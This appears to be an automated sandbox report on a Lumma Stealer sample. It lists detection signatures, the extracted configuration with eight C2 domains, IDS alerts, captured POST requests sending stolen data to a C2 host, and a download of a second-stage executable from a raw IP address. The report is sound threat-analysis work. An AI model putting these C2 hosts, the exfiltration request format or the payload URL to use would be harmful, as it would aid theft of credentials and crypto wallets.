Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1543216
MD5: 5c0022dd6f83870f6a81faf362383ae3
SHA1: a34e622e2bafbbbc107bb7311681516126838e90
SHA256: 1df402c5bd54c8b600ba43b0c94ff494786617d2276aec771af24202b310ac63
Tags: exe, user-Bitsight

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Detected potential crypto function
Entry point lies outside standard sections
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • file.exe (PID: 7472 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 5C0022DD6F83870F6A81FAF362383AE3)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["thumbystriw.store", "navygenerayk.store", "presticitpo.store", "necklacedmny.store", "founpiuer.store", "fadehairucw.store", "crisiwarny.store", "scriptyprefej.store"], "Build id": "4SD0y4--legendaryy"}
Source | Rule | Description | Author
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security
00000000.00000003.1711943208.00000000006DE000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
Process Memory Space: file.exe PID: 7472 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
Process Memory Space: file.exe PID: 7472 | JoeSecurity_LummaCStealer | Yara detected LummaC Stealer | Joe Security
decrypted.memstr | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security

No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-27T13:03:01.697402+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49730 | 172.67.170.64 | 443 | TCP
2024-10-27T13:03:02.892163+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49731 | 172.67.170.64 | 443 | TCP
2024-10-27T13:03:39.473628+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49701 | 172.67.170.64 | 443 | TCP
2024-10-27T13:03:01.697402+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.4 | 49730 | 172.67.170.64 | 443 | TCP
2024-10-27T13:03:02.892163+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.4 | 49731 | 172.67.170.64 | 443 | TCP
2024-10-27T13:03:40.380479+0100 | 2019714 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49702 | 185.215.113.16 | 80 | TCP
2024-10-27T13:03:09.964365+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49735 | 172.67.170.64 | 443 | TCP

AV Detection

Source: file.exe | Avira: detected
Source: file.exe.7472.0.memstrmin | Malware Configuration Extractor: LummaC {"C2 url": ["thumbystriw.store", "navygenerayk.store", "presticitpo.store", "necklacedmny.store", "founpiuer.store", "fadehairucw.store", "crisiwarny.store", "scriptyprefej.store"], "Build id": "4SD0y4--legendaryy"}
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: 00000000.00000002.2086933404.0000000000841000.00000040.00000001.01000000.00000003.sdmp | String decryptor: scriptyprefej.store
Source: 00000000.00000002.2086933404.0000000000841000.00000040.00000001.01000000.00000003.sdmp | String decryptor: navygenerayk.store
Source: 00000000.00000002.2086933404.0000000000841000.00000040.00000001.01000000.00000003.sdmp | String decryptor: founpiuer.store
Source: 00000000.00000002.2086933404.0000000000841000.00000040.00000001.01000000.00000003.sdmp | String decryptor: necklacedmny.store
Source: 00000000.00000002.2086933404.0000000000841000.00000040.00000001.01000000.00000003.sdmp | String decryptor: thumbystriw.store
Source: 00000000.00000002.2086933404.0000000000841000.00000040.00000001.01000000.00000003.sdmp | String decryptor: fadehairucw.store
Source: 00000000.00000002.2086933404.0000000000841000.00000040.00000001.01000000.00000003.sdmp | String decryptor: crisiwarny.store
Source: 00000000.00000002.2086933404.0000000000841000.00000040.00000001.01000000.00000003.sdmp | String decryptor: presticitpo.store
Source: 00000000.00000002.2086933404.0000000000841000.00000040.00000001.01000000.00000003.sdmp | String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000002.2086933404.0000000000841000.00000040.00000001.01000000.00000003.sdmp | String decryptor: TeslaBrowser/5.5
Source: 00000000.00000002.2086933404.0000000000841000.00000040.00000001.01000000.00000003.sdmp | String decryptor: - Screen Resoluton:
Source: 00000000.00000002.2086933404.0000000000841000.00000040.00000001.01000000.00000003.sdmp | String decryptor: - Physical Installed Memory:
Source: 00000000.00000002.2086933404.0000000000841000.00000040.00000001.01000000.00000003.sdmp | String decryptor: Workgroup: -
Source: 00000000.00000002.2086933404.0000000000841000.00000040.00000001.01000000.00000003.sdmp | String decryptor: 4SD0y4--legendaryy
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 172.67.170.64:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.170.64:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.170.64:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.170.64:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.170.64:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.170.64:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.170.64:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.170.64:443 -> 192.168.2.4:49701 version: TLS 1.2
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Adobe
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\3D Objects
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Packages
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Mozilla
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\PeerDistRepub

Networking

Source: Network traffic | Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49731 -> 172.67.170.64:443
Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49730 -> 172.67.170.64:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49731 -> 172.67.170.64:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49730 -> 172.67.170.64:443
Source: Network traffic | Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49735 -> 172.67.170.64:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49701 -> 172.67.170.64:443
Source: Malware configuration extractor | URLs: thumbystriw.store
Source: Malware configuration extractor | URLs: navygenerayk.store
Source: Malware configuration extractor | URLs: presticitpo.store
Source: Malware configuration extractor | URLs: necklacedmny.store
Source: Malware configuration extractor | URLs: founpiuer.store
Source: Malware configuration extractor | URLs: fadehairucw.store
Source: Malware configuration extractor | URLs: crisiwarny.store
Source: Malware configuration extractor | URLs: scriptyprefej.store
Source: Joe Sandbox View | IP Address: 172.67.170.64
Source: Joe Sandbox View | IP Address: 185.215.113.16
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic | Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:49702 -> 185.215.113.16:80
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: crisiwarny.store
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 52
    Host: crisiwarny.store
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 18168
    Host: crisiwarny.store
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8789
    Host: crisiwarny.store
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 20442
    Host: crisiwarny.store
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 1271
    Host: crisiwarny.store
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 568249
    Host: crisiwarny.store
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 87
    Host: crisiwarny.store
Source: global traffic | HTTP traffic detected:
    GET /off/def.exe HTTP/1.1
    Connection: Keep-Alive
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Host: 185.215.113.16
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | HTTP traffic detected:
    GET /off/def.exe HTTP/1.1
    Connection: Keep-Alive
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Host: 185.215.113.16
Source: global traffic | DNS traffic detected: DNS query: presticitpo.store
Source: global traffic | DNS traffic detected: DNS query: crisiwarny.store
Source: global traffic | DNS traffic detected: DNS query: 206.23.85.13.in-addr.arpa
Source: unknown | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: crisiwarny.store
Source: file.exe, 00000000.00000003.2086064735.00000000006BF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2086762508.00000000006C1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.16/
Source: file.exe, 00000000.00000003.2086064735.00000000006BF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2086762508.00000000006C1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.16/Q=
Source: file.exe, 00000000.00000002.2086588158.0000000000672000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2086360372.000000000019A000.00000004.00000010.00020000.00000000.sdmp, file.exe, 00000000.00000003.2086064735.00000000006BF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2086762508.00000000006C1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.16/off/def.exe
Source: file.exe, 00000000.00000002.2086588158.0000000000672000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.16/off/def.exeS
Source: file.exe, 00000000.00000002.2086588158.000000000065F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.16:80/off/def.exe
Source: file.exe, 00000000.00000003.1742224060.000000000512B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: file.exe, 00000000.00000003.1742224060.000000000512B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: file.exe, 00000000.00000003.1742224060.000000000512B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: file.exe, 00000000.00000003.1742224060.000000000512B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: file.exe, 00000000.00000003.1742224060.000000000512B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: file.exe, 00000000.00000003.1742224060.000000000512B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: file.exe, 00000000.00000003.1742224060.000000000512B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: file.exe, 00000000.00000003.1742224060.000000000512B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
Source: file.exe, 00000000.00000003.1742224060.000000000512B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: file.exe, 00000000.00000003.1742224060.000000000512B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.c.lencr.org/0
Source: file.exe, 00000000.00000003.1742224060.000000000512B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.i.lencr.org/0
Source: file.exe, 00000000.00000003.1712394447.0000000005139000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: file.exe, 00000000.00000003.1712394447.0000000005139000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000003.1712394447.0000000005139000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000003.1712394447.0000000005139000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: file.exe, 00000000.00000003.1741732815.0000000000704000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1793344937.000000000510C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2086762508.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2089716142.000000000510C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2085807683.00000000006D7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1711799765.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1781336814.00000000006FE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1711943208.00000000006DE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://crisiwarny.store/
Source: file.exe, 00000000.00000002.2089716142.000000000510C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://crisiwarny.store/0
Source: file.exe, 00000000.00000003.1793344937.000000000510C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://crisiwarny.store/H
Source: file.exe, 00000000.00000003.1711799765.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1711943208.00000000006DE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://crisiwarny.store/J
Source: file.exe, file.exe, 00000000.00000002.2086588158.0000000000689000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2064631694.00000000006E5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1793004274.0000000005102000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1711799765.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1781336814.00000000006FE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://crisiwarny.store/api
Source: file.exe, 00000000.00000003.1793004274.0000000005102000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://crisiwarny.store/api9
Source: file.exe, 00000000.00000003.1793207907.00000000006F5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2064513836.0000000000700000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://crisiwarny.store/apibu
Source: file.exe, 00000000.00000002.2086588158.0000000000672000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://crisiwarny.store/apig
Source: file.exe, 00000000.00000003.1759143782.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1786059361.00000000006FE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1781336814.00000000006FE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1759468384.00000000006FE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://crisiwarny.store/bfa
Source: file.exe, 00000000.00000003.2064902373.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2064714160.00000000006D7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://crisiwarny.store/g
Source: file.exe, 00000000.00000003.2064902373.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2064714160.00000000006D7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://crisiwarny.store/s://crisiwarny.store/apit
Source: file.exe, 00000000.00000003.1756778602.0000000000704000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1741732815.0000000000704000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1742430669.0000000000704000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1781336814.00000000006FE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://crisiwarny.store/u
Source: file.exe, 00000000.00000003.1793207907.00000000006F5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2064513836.0000000000700000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1759143782.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1786059361.00000000006FE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1781336814.00000000006FE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1759468384.00000000006FE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://crisiwarny.store/v8hs
Source: file.exe, 00000000.00000003.1793344937.000000000510C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://crisiwarny.store/x
Source: file.exe, 00000000.00000002.2086588158.000000000065F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://crisiwarny.store:443/api
Source: file.exe, 00000000.00000002.2086588158.000000000065F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://crisiwarny.store:443/apitxtPK
Source: file.exe, 00000000.00000003.1712394447.0000000005139000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000003.1712394447.0000000005139000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000003.1712394447.0000000005139000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: file.exe, file.exe, 00000000.00000003.1759077269.0000000000709000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1756778602.0000000000704000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: file.exe, 00000000.00000002.2086588158.000000000065F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://presticitpo.store:443/api
Source: file.exe, 00000000.00000003.1712165908.0000000005150000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.microsof
Source: file.exe, 00000000.00000003.1743350143.000000000521B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: file.exe, 00000000.00000003.1743350143.000000000521B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: file.exe, 00000000.00000003.1712232842.0000000005147000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1712165908.000000000514E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: file.exe, 00000000.00000003.1712232842.0000000005122000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: file.exe, 00000000.00000003.1712232842.0000000005147000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1712165908.000000000514E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: file.exe, 00000000.00000003.1712232842.0000000005122000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: file.exe, 00000000.00000003.1712394447.0000000005139000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
Source: file.exe | String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C
Source: file.exe, 00000000.00000003.1759077269.0000000000709000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1756778602.0000000000704000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: file.exe, 00000000.00000003.1712394447.0000000005139000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: file.exe, 00000000.00000003.1743350143.000000000521B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: file.exe, 00000000.00000003.1743350143.000000000521B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: file.exe, 00000000.00000003.1743350143.000000000521B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: file.exe, 00000000.00000003.1743350143.000000000521B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: file.exe, 00000000.00000003.1743350143.000000000521B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: unknown | Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown | Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown | Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49701
Source: unknown | HTTPS traffic detected: 172.67.170.64:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.170.64:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.170.64:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.170.64:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.170.64:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.170.64:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.170.64:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.170.64:443 -> 192.168.2.4:49701 version: TLS 1.2

            System Summary

            Source: file.exe | Static PE information: section name: (unprintable)
            Source: file.exe | Static PE information: section name: .rsrc
            Source: file.exe | Static PE information: section name: .idata
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_3_006F697C
